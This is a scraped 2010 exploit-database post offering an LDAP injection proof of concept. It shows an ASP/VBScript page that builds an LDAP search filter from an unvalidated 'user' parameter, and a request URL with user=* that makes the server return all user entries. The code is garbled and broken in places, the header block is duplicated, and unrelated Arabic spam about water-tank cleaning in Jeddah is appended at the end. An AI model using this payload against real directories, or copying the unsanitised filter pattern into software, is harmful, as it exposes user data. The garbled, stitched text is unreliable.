LDAP Injection
# Title: LDAP Injection POC
# EDB-ID: 11364
# CVE-ID: ()
# OSVDB-ID: ()
# Author: mc2_s3lector
# Published: 2010-02-09
# Verified: no
# Download Exploit Code
# Download N/A
http://www.exploit-db.com/exploits/11364
http://inj3ct0r.com/exploits/10800
http://www.vfocus.net/art/20100210/6611.html
http://packetstormsecurity.nl/filedesc/ldap-poc.txt.html
# EDB-ID: 11364
# CVE-ID: ()
# OSVDB-ID: ()
# Author: mc2_s3lector
# Published: 2010-02-09
# Verified: no
# Download Exploit Code
# Download N/A
http://www.exploit-db.com/exploits/11364
http://inj3ct0r.com/exploits/10800
http://www.vfocus.net/art/20100210/6611.html
http://packetstormsecurity.nl/filedesc/ldap-poc.txt.html
[+] Vurnerebility: LDAP Injection[+] Category : Implemented Web exploit |
[+] Category : Attack Technique |
[+] Author : mc2_s3lector |
[+] dork : X/o\" |
[+] Contact : www.yogyacarderlink.web.id |
[+] date : 4-2-10 |
[+] biGthank to : Allah SWT,jasakom,KeDai Computerworks,0n3-d4y n3ro,eplaciano, all*.indonesian like a coding, |
--------------------------------------------------------------------------------------------------------------------------------------------------- |
Directory acces protokol/directory manipulation,protokol breaker->standar protocol,query |
custom statement,page request,componen execute command,data base server,web apps services |
modify,remove etc. |
--------------------------------------------------------------------------------------------------------------------------------------------------- |
code: |
|
|
|
<%@ Language=VBScript %> |
<% |
Dim userName |
Dim filter |
Dim ldapObj |
Const LDAP_SERVER = "ldap.example" |
userName = Request.QueryString("user")<-----------*1(LOOK THIS BUG LINE PARAMETER USER=EMPTY) |
( userName = "" ) then |
Response.Write("Invalid |
request. Please specify a |
valid user name |
Response.End() |
end if |
filter= "(uid=" + CStr(userName) + //((*1)) |
userName used to initialize filter variable on this line direct query LDAP call to finf filter on ((*.3)) |
")" ' searching |
for the user entry |
'Creat LDAP object and setting |
the base dn |
Set ldapObj = |
Server.CreateObject("IPWorksASP.LDAP") |
ldapObj.ServerName = LDAP_SERVER |
ldapObj.DN = |
"ou=people,dc=spilab,dc=com" |
'Setting the search filter |
ldapObj.SearchFilter = ((*.3))filter<---call SearchFilter on this line |
ldapObj.Search |
'Showing the user ennumeratin info |
While ldapObj.result = ((1*.4 to *.5)) |
Response.Write("") |
Write("User |
information for : " + |
ldapObj.AttrValue(0) + " |
For i = 0 To ldapObj.AttrCount -1 |
Response.Write("" + |
ldapObj.AttrType(i) + |
" : " + ldapObj.AttrValue(i) + " |
Response.Write("") |
Wend ((*.5)) |
%> |
|
|
|
--------------------------------------------------------------------------------------------------------------------------------------------------- |
control over LDAP to querry =server LDAP & get query result from ((*.4 to *.5)) |
POC: |
http://server/ldapsearch.asp?user=* <----send the * character in the parameter user,result flter variable in code to be initialized with |
(uid=*). The resulting LDAP statement will make the server return |
------------------------------------------------------------------------------------------------------------------------------------------------- |
Category Article Exploits
من افضل واقوى شركات تنظيف خزانات المياه بجدة تلك التي تقوم بأعمال تنظيف وتعقيم خزانات المياه في جدة بمنتهى الدقة والاحترافية وتقدم شركة غسيل خزانات بجدة خدمات جيدة في تنظيف وتعقيم الخزانات لكي تحافظ على الماء نظيفا ومعقما اطول فترة زمنية ممكنة